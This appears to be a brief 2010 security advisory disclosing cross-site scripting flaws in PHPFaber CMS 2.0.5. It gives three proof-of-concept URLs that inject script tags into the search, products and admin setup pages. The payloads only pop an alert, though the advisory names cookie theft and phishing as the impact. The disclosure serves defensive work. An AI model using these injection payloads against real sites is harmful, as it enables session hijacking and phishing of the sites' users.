############################
############################

# Author: prodigy
# Date found: 4/07/2010

############################

###############################

# Software: PHPFaber Content Management System
# Vendor: www.phpfaber.com
# version: 2.0.5
# Vulnerability founded: Multiple XSS Vulnerabilities
# Risk: Medium
# Impact: Malicious attackers can run javascript code into the page to perform phising attacks and cookie stealing.
  

################################

##################################
            PoC 
##################################

http://server/cms/module.php?mod=Search&query=%3Cscript%3Ealert%280%29%3C/script%3E&stype=OR&go=++++Go!++++

http://server/cms/module.php/Products/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

http://server/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup


And more...
################################

Greetz: thanks myself for find the bug

################################